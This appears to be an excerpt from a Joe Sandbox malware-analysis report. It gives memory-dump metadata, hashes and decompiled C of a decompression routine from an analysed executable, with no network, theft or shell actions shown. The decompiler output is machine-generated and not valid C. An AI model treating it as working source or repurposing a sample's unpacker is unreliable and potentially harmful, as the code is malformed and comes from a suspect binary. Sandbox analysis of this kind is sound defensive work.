                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eb3

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                  • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                                                  			E00406DFB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407395))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
